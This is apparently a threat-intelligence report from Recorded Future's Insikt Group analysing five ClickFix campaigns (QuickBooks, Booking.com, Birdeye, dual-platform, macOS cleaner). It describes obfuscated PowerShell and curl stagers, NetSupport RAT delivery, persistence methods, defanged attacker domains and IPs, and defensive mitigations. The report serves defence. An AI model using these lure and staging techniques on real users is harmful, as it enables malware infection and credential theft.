Insikt Group reveals five ClickFix social engineering clusters (QuickBooks, Booking.com, Birdeye) targeting Windows and macOS. Learn how threat actors exploit native system tools with malicious, obfuscated commands to gain initial access, and get key mitigations for defense

Executive Summary

Insikt Group identified five distinct clusters leveraging the ClickFix social engineering technique to facilitate initial access to host systems. Observed since at least May 2024, these clusters include those impersonating financial application Intuit QuickBooks and the travel agency Booking.com. Insikt Group leveraged the Recorded Future® HTML Content Analysis dataset, which enables systematic monitoring of embedded web artifacts to identify and track new malicious domains and infrastructure.

The clusters demonstrate significant operational variance in lure themes and infrastructure patterns, and highlight the technique's evolution, moving past simple verification by visually fooling victims with various fake challenges and demonstrating technical sophistication through operating system detection to tailor execution chains. Despite these structural differences, its operation is largely the same, showing that ClickFix’s core techniques work across platforms and only the social engineering lure needs to be adapted to the victim. Threat actors manipulate victims into executing malicious, obfuscated commands directly within native system tools like the Windows Run dialog box or macOS Terminal.

This living-off-the-land (LotL) approach allows malicious scripts to execute in-memory, effectively bypassing traditional browser security and endpoint controls. Parallel clusters targeting sectors as diverse as accounting, real estate, and legal services indicates that ClickFix has transitioned into a standardized, high-ROI template for both cybercriminal and potentially advanced persistent threat (APT) groups.

To protect against these threats, security defenders should move beyond simple indicator blocking and prioritize aggressive behavioral hardening. Key recommendations include disabling the Windows Run dialog box via Group Policy Objects (GPO), implementing PowerShell Constrained Language Mode (CLM), and operationalizing Digital Risk Prevention tools such as Recorded Future's Malicious Websites to identify and mitigate threats to your digital assets.

Based on increasing use since 2024, Insikt Group assesses that the ClickFix methodology will very likely remain a primary initial access vector throughout 2026 as threat actors continue to social engineer victims to enable exploitation. Looking ahead, Insikt Group anticipates ClickFix lures will become increasingly technically adaptive, incorporating more selective browser fingerprinting, while continuing to use infrastructure that can be built and dismantled quickly. In addition to technical refinements, Insikt Group predicts that the social engineering component will continue to evolve, leveraging new techniques to lure victims into executing malicious commands.

Key Findings

• Insikt Group identified and tracked five distinct ClickFix activity clusters exhibiting significant operational variance in lure themes and infrastructure patterns despite a shared reliance on fraudulent human-verification lures. This indicates that the ClickFix methodology has transitioned into a standardized, high-ROI template adopted across a fragmented ecosystem of threat actors.


• While visually diverse, all analyzed clusters use a consistent execution framework that bypasses traditional browser security controls by shifting the point of exploitation to user-assisted manual commands. These campaigns target a wide variety of sectors, including accounting (QuickBooks), travel (Booking.com), and system optimization (macOS).


• ClickFix technical execution follows a standardized four-stage pattern: input of highly encoded or fragmented strings, native execution via legitimate system shells living-off-the-land binaries (LOLBins), remote ingress from threat actor-controlled infrastructure, and immediate in-memory execution. This methodology allows threat actors to stage and run remote code with limited and short-lived forensic artifacts on the host system.

Background

First documented in late 2023, ClickFix has transitioned from a niche social engineering tactic to a cornerstone of the global cybercriminal ecosystem. ClickFix is a social engineering methodology that lures victims into manually executing malicious commands by masquerading as a necessary technical resolution for fabricated system errors or human-verification prompts. This technique represents an evolutionary shift from the FakeUpdates (SocGholish) model, prioritizing manual user intervention to evade the increasingly robust security features of modern web browsers and automated endpoint detection systems. In this context, the methodology embodies a "think smart, not hard" approach. The simplicity of relying on a manual user action makes it a potent defensive evasion tactic: bypassing typical browser-based security makes it difficult to detect, while the high number of threat actors using it makes it difficult to track across a fragmented threat landscape.

The technical core of the methodology relies primarily on pastejacking, where background JavaScript populates a victim's clipboard with an obfuscated command while they are distracted by visual lures such as fraudulent reCAPTCHA or Cloudflare Turnstile overlays. In some instances, malicious commands are not automatically pasted into the victim’s clipboard, but rather, victims are manipulated into copying and running the command manually. By leveraging a living-off-the-land (LotL) approach, threat actors manipulate users into executing these commands directly within trusted system tools like the Windows Run dialog box, PowerShell, or the macOS Terminal. This user-assisted execution allows malicious scripts to execute silently and bypass traditional browser and endpoint security perimeters.

ClickFix has been weaponized by a diverse spectrum of threat actors, ranging from high-volume initial access brokers (IABs) to sophisticated state-sponsored groups such as BlueDelta (aka APT28) and the North Korean group PurpleBravo. The methodology enables a repeatable and scalable delivery framework capable of deploying a wide variety of secondary payloads, including infostealers like Lumma Stealer and Vidar, or remote access trojans (RATs) such as NetSupport RAT and Odyssey Stealer. These operations are frequently supported by highly adaptive, disposable infrastructure designed to maintain operational continuity even as individual domains are identified and blocked.

Technical Analysis

Insikt Group identified and tracked five emerging ClickFix clusters by leveraging the Recorded Future HTML Content Analysis dataset, which enables the systematic monitoring of embedded web artifacts. By pivoting on unique technical identifiers, including specific Document Object Model (DOM) hashes, hard-coded image source tags, and unique page titles, Insikt Group mapped ClickFix’s infrastructure and identified new malicious domains and infrastructure, facilitating the discovery of active domains and near real-time monitoring of cluster evolution.

Across the analyzed clusters, Insikt Group detailed the ClickFix commands victims were manipulated into executing on their systems. These commands relied heavily on LOLBins to achieve operational goals. By using LOLBins, threat actors leveraged native, legitimately signed executables to download malicious payloads to a victim's machine. Depending on the security implementation of personal machines or corporate endpoints, this methodology can effectively evade standard detections and foundational security principles.

ClickFix Clusters

Insikt Group identified five clusters (see Figure 1) that exhibited significant operational variance despite a shared reliance on the ClickFix social engineering technique. These clusters were defined by their infrastructure patterns and targeting approaches, ranging from logistics-themed lures to dual-platform selection logic. This indicates that the ClickFix methodology is being deployed across a fragmented ecosystem of threat actors, each tailoring the technique to suit their own delivery requirements and victim profiles.

These clusters were grouped based on observable patterns in infrastructure reuse, lure formatting, platform targeting, and operational adjustments over time. While core technical elements and delivery mechanisms overlap, each cluster maintained a distinct footprint within the broader landscape. Insikt Group categorized the activity into the following five clusters:

• Intuit QuickBooks: Targeted impersonation of accounting software, often leveraging aged domains to bypass security filters


• Booking.com: Used fraudulent domains to present fake verification portals


• Birdeye: A large-scale cluster that lures users of the AI marketing company Birdeye by spoofing domains and manipulating victims to use a malicious command to deliver NetSupport RAT.


• Dual-Platform Selection: Used operating system detection to deliver platform-tailored lures and malware


• macOS Storage Cleaning: Used counterfeit prompts mimicking macOS system optimization to trick users into executing encoded terminal commands

Cluster 1: Intuit QuickBooks

Cluster 1 was observed operating from January 2026 to the time of writing, primarily targeting organizations through social engineering lures impersonating the accounting software Intuit QuickBooks. QuickBooks is widely used for tax preparation in the United States; given the campaign's active window coincides with the US tax season (typically January through April 15), Insikt Group assesses with moderate confidence that the timing was a calculated effort to target entities engaged in financial reporting. Although this cluster recently pivoted to targeting users of the US real estate marketplace Zillow, QuickBooks-related artifacts and brand-specific imagery remain deeply embedded throughout the Document Object Model (DOM) of the malicious landing pages.

Cluster 1 Profile

Cluster 1 Infection Chain

The infection chain begins when a victim lands on a ClickFix landing page. The page presents a fraudulent human-verification interface (see Figure 3) that instructs the victim to complete specific "verification" steps.

By interacting with the page, the victim unknowingly copies a malicious command to their system clipboard. The technique often results in execution through native system utilities, such as Windows Run dialog and PowerShell, leveraging LOLBins to evade traditional browser and endpoint-based security controls.

Upon pasting the command, an obfuscated PowerShell script (Figure 4) executes in a hidden window. This stager uses self-referential function names to dynamically construct and invoke Invoke-RestMethod to the domain nobovcs[.]com.

This request triggers the retrieval of a short PowerShell stager (see Figure 5) that downloads a second-stage payload, bibi.php, saving it to the %TEMP% directory as script.ps1. This stager is the initial execution step that kicks off the NetSupport RAT installation.

The bibi.php script is essential for the final deployment phase and for obfuscating on-disk artifacts. It contains a function called Get-RomanticName, which selects and combines strings from a thematic wordlist, including terms such as "Heart", "Soul", and "Desire", to generate a randomized folder name under %LOCALAPPDATA%, where the staging files are placed.

The script retrieves four primary files from nobovcs[.]com, detailed in Table 2.

Table 2: Filenames and SHA256 hashes of the files downloaded from nobovcs[.]com (Source: Recorded Future)

The script uses 7z.exe to extract at.7z (protected by the password “pppp”), which contains the NetSupport RAT binary, neservice.exe. Persistence is established by hijacking Startup shortcuts; if no existing shortcut is detected, the script extracts lnk.7z to the Startup folder to ensure the payload launches automatically upon system reboot.

Following successful execution, the binary neservice.exe performs an HTTP GET request to gologpoint[.]com to initiate command-and-control (C2) communications. gologpoint[.]com resolves to the IP address 62[.]164[.]177[.]230.

Cluster 2: Booking.com

Cluster 2 was observed operating from February 2026 to the time of writing, impersonating the travel agency Booking.com. Insikt Group tracked the cluster by pivoting on a unique DOM hash made possible by the threat actor’s repeated use of a unique HTML title and consistent image files. Indicators of compromise (IoCs) tagged in this cluster can be seen in the Recorded Future HTML Content Analysis. The landing pages for this cluster use a counterfeit reCAPTCHA v2 challenge, requiring victims to select all photos containing a "bucket" (Figure 6). Insikt Group observed that the same challenge photos are presented in the same order across all analyzed pages.

Cluster 2 Profile

Cluster 2 Infection Chain

The process begins when a victim interacts with the fake challenge. Upon completing the challenge, the victim is redirected to a verification page where a malicious PowerShell command (see Figure 8) is copied to the system clipboard. Instructions on the verification page manipulate the victim into opening the Windows Run dialog box and entering the command. Executing this malicious command starts the infection chain for NetSupport RAT.

The PowerShell command provided in script.ps1 (see Figure 9) executes with the -NoProfile and -ExecutionPolicy Bypass flags to evade standard logging and security restrictions. Following execution, the system pulls four staging files to a directory named DesireSpark Serenade. This directory naming convention is functionally identical to the "romantic" naming methodology observed in Cluster 1.

The primary staging mechanism relies on script.ps1 to pull secondary payloads from the staging server. In one analyzed instance, scripts originating from thestayreserve[.]com reached out to checkpulses[.]com to retrieve the files detailed in Table 4.

Table 4: Filenames and SHA256 hashes of the files downloaded from checkpulses[.]com (Source: Recorded Future)

The 7z.exe utility is used to extract at.7z, which contains the NetSupport RAT binary neservice.exe. Persistence is established by adding a link to the system Startup folder.

The domains observed across this cluster use a similar PowerShell command pattern. However, once the command is executed, the infection chain varies slightly with the staging infrastructure being called. In the cases of sign-in-op-token[.]com and the thestayreserve[.]com domains, the malicious command is identical in terms of pattern and organization, but the hard-coded dropper domain is bkng-updt[.]com and checkpulses[.]com, respectively.

While staging domains vary, the final payloads across this cluster converge on the same NetSupport RAT C2 infrastructure (Table 5).

Table 5: IoCs observed in the Booking.com infection chain (Source: Recorded Future)

Following installation, the malware from thestayreserve[.]com initiates communication (Figure 10) with chrm-srv[.]com and ms-scedg[.]com, both of which resolve to 152[.]89[.]244[.]70. The domain hotelupdatesys[.]com , resolves to the same IP address as the NetSupport RAT C2 for sign-in-op-token[.]com.

Cluster 3: Birdeye

Cluster 3 was observed operating from May 2024 until the time of writing. Previously reported on by Insikt Group, this cluster uses infrastructure centered on domains incorporating the keyword "bird" to deliver its ClickFix lure pages, trackable in Recorded Future’s HTML Content Analysis. These lures spoof Birdeye, an AI marketing company, to manipulate victims into executing malicious commands.

Cluster 3 Profile

Cluster 3 Infection Chain

The infection chain begins when a victim visits a compromised site and is presented with a Cloudflare-style CAPTCHA challenge. Upon interacting with the page, the victim is prompted to run a command in the Windows Run dialog box. Insikt Group identified this cluster by pivoting on unique technical identifiers within the HTML artifacts, including a consistent and unique page title and a static image used across the infrastructure.

The command the victim is manipulated into running causes the victim’s device to reach out to alababababa[.]cloud to download a payload from hxxps[://]alababababa[.]cloud/cVGvQio6[.]txt. To further reduce suspicion, once the malicious command is executed, the victim is redirected to the legitimate birdeye.com website (see Figure 12).

Analysis of the JavaScript within the DOM for this cluster, provided in Appendix F, revealed insights into the threat actor's methods. A notable portion of the script uses seven obfuscated lines that are concatenated into a single string to be attached to the victim's clipboard. The developer left comments within the code that detail the deobfuscated purpose of each line. For example, one comment explicitly identifies the portion of the command calling PowerShell with specific flags (Figure 13).

Furthermore, a comment written in Cyrillic at the beginning of the script translates to, "This should help bypass Cloudflare static analysis". This internal documentation suggests the threat actor is purposefully detailing their actions to refine bypass techniques against security scanners.

Historically, alababababa[.]cloud has been associated with the delivery of multiple malware strains, including Lumma Stealer and RedLine Stealer. The large volume of domains identified in this cluster, exceeding 40 unique entries, highlights the scale of the "run and repeat" model used to sustain this activity.

Cluster 4: Dual-Platform Selection

Cluster 4 was observed operating from March 2025 to the time of writing. This cluster is unique for its use of operating system detection to deliver tailored ClickFix lures for both Windows and macOS users. Unlike standard ClickFix behavior that typically pushes commands to the clipboard automatically, this variant provides detailed manual instructions, requiring the victim to open native system tools and manually copy and paste the provided staging payload. One of the ClickFix pages used to analyze this behavior was macosapp-apple[.]com, hosted at IP address 45[.]144[.]233[.]192.

Cluster 4 Profile

Cluster 4 Infection Chain

The infection chain begins when a victim lands on a ClickFix page that instructs them to verify they are human (Figure 15).

Once the Terminal is open, the victim is prompted to execute a multi-stage command that purportedly "finds and removes temporary system files".

In reality, these commands (see Table 9) use different encoding layers to hide their true intent; the first example decodes a hexadecimal string to reveal a Base64-encoded client URL (curl) instruction, while the second directly decodes a Base64 string to run an executable command. Both methods ultimately bypass simple pattern matching by obfuscating the malicious payload until execution.

As shown in Table 10, the revealed curl instruction uses a compound set of arguments, in this cluster, -kfsSL, to facilitate silent delivery. These flags ensure that Transport Layer Security (TLS) certificate checks are bypassed, server-side errors are suppressed, and the process remains hidden from the user's view while following redirections to reach the final payload domain.

Based on historic evidence (1, 2) and forensic patterns, Insikt Group assesses with high confidence that the information stealer MacSync was the primary payload used to infect victims in this cluster. The malicious commands on these pages caused the infected systems to reach out to a specific set of staging and C2 infrastructure, detailed in Table 11. Notably, while the domains varied, they were frequently observed behind Cloudflare to complicate network-level blocking.

Table 11: C2 servers identified for the macOS cleaner campaign (Source: Recorded Future)

Copy Command Analysis

Insikt Group analyzed commands across the five clusters identified in this research. While the visual lures and impersonated brands vary between groups like Cluster 1 (Intuit QuickBooks) and Cluster 5 (macOS Storage Cleaning), the underlying execution logic remains consistent. This "run and repeat" methodology relies on a narrow set of trusted LOLBins and lightweight obfuscation to stage remote code with minimal forensic artifacts.

The technical implementation of ClickFix follows a standardized four-stage pattern across all target operating systems, as summarized in Table 12.

Table 12: Standardized four-stage ClickFix execution pattern (Source: Recorded Future)

Insikt Group identified two primary command styles used in macOS-centric campaigns, such as Cluster 4 and Cluster 5, which are detailed in Table 13.

Table 13: Observed tactics, techniques, and procedures (TTPs) for macOS and Linux (zsh and bash) commands (Source: Recorded Future)

Windows-based commands, particularly those observed in Cluster 1 and Cluster 2, exhibit a higher degree of sophistication through "Command Swizzling" and case randomization, as shown in Table 14.

Table 14: Observed TTPs for Windows (PowerShell) commands (Source: Recorded Future)

Mitigations

To mitigate the threats posed by ClickFix social engineering and related living-off-the-land (LotL) techniques, Insikt Group recommends a defense-in-depth approach that combines proactive intelligence monitoring with aggressive hardening of native system utilities.

• Operationalize HTML Content Analysis: Recorded Future customers should use the HTML Content Analysis source to monitor for impersonations of their brand, which are leveraged to deliver ClickFix. Leverage the Recorded Future Intelligence Operations Platform to monitor for unique web artifacts, such as specific Document Object Model (DOM) hashes and page titles, to identify new ClickFix domains in real time.


• Use Recorded Future Threat Intelligence: Recorded Future customers can proactively mitigate this threat by operationalizing Recorded Future Intelligence Operations Platform data, specifically by leveraging continuously updated Risk Lists and by blocklisting IP addresses and domains associated with ClickFix to block communication with malicious infrastructure.


• Monitor Malicious Infrastructure Risk Lists: Continuously update security information and event management (SIEM) and endpoint detection and response (EDR) tools with Recorded Future Risk Lists to block traffic to identified staging and command-and-control (C2) domains.


• Use Malware Intelligence: Leverage the Recorded Future Intelligence Operations Platform to hunt for indicators of compromise (IoCs) associated with payloads identified in this report, such as NetSupport RAT, Odyssey Stealer, and Lumma Stealer.


• Leverage Network Intelligence: Use Recorded Future Network Intelligence to detect exfiltration events early (such as those linked to NetSupport RAT), which can help prevent intrusions before they escalate. This approach relies on comprehensive, proactive infrastructure discovery provided by Insikt Group and the analysis of vast amounts of network traffic.


• Use Identity Module: Recorded Future customers should leverage the Identity Module to monitor for credentials and passwords being sold on the dark web that have been stolen by information stealers.


• Disable Windows Run Dialog via Group Policy Objects (GPOs): For corporate environments, disable the Win+R keyboard shortcut and the Run command in the Start menu via Group Policy Objects (GPOs). This significantly hinders the ClickFix execution chain, as victims are typically instructed to paste malicious commands directly into this dialog box.


• Restrict Terminal and PowerShell Execution: Implement PowerShell Constrained Language Mode (CLM) and use AppLocker or Windows Defender Application Control (WDAC) to prevent the execution of unassigned scripts and the misuse of living-off-the-land binaries (LOLBins). On macOS, restrict Terminal and other shell interpreters (for example, zsh and bash) using application control policies enforced via mobile device management (MDM), and leverage System Integrity Protection (SIP) and endpoint security controls to limit unauthorized script execution and abuse of native command-line utilities.


• User Awareness and Training: Conduct targeted social engineering simulations that specifically educate users on the dangers of "manual verification" prompts that require copying and pasting commands into system utilities.

Outlook

The identification of five parallel operational clusters targeting diverse sectors, including accounting, travel, real estate, and legal services, indicates that the ClickFix methodology has transitioned from a niche technique to a standardized template within the cybercriminal ecosystem. This standardized "run and repeat" model is facilitating broader adoption by both lower-tier "traffers" and sophisticated advanced persistent threat (APT) groups. Threat actors are able to maintain operational continuity even when individual domains are blocked due to the availability of disposable infrastructure and shared technical templates.

Insikt Group assesses with high confidence that the ClickFix methodology will very likely remain a heavily used initial access vector throughout 2026. The continued success of ClickFix is driven by its ability to bypass advanced browser-based security controls by shifting the point of exploitation to user-assisted manual actions. As long as native system utilities such as PowerShell and Terminal remain accessible to end-users, ClickFix will continue to offer threat actors a high-return, low-complexity alternative to traditional exploit kits.

Looking ahead, ClickFix lures will likely become increasingly technically adaptive. Future iterations are expected to incorporate more granular browser fingerprinting to conditionally serve payloads based on a victim's hardware, geographic location, or organizational profile. Furthermore, since threat actors are already purposefully documenting bypass techniques for static analysis engines within their code, Insikt Group anticipates a long-term trend toward more resilient and obfuscated staging environments. This convergence of sophisticated social engineering and LotL techniques necessitates a shift in defensive strategy, moving away from simple indicator blocking toward aggressive behavioral hardening of the system utilities that ClickFix relies upon.

Appendix A: Indicators of Compromise

Appendix B: Cluster 1 — Intuit QuickBooks Indicators

Appendix C: bibi.php Script

Appendix D: Cluster 2 — Booking.com Indicators

Appendix E: Cluster 3 — Birdeye Indicators

Appendix F: Birdeye Cluster Javascript

Appendix G: Cluster 4 — Dual-Platform Selection Indicators

Source: RecordedFuture
Source Link: https://www.recordedfuture.com/research/clickfix-campaigns-targeting-windows-and-macos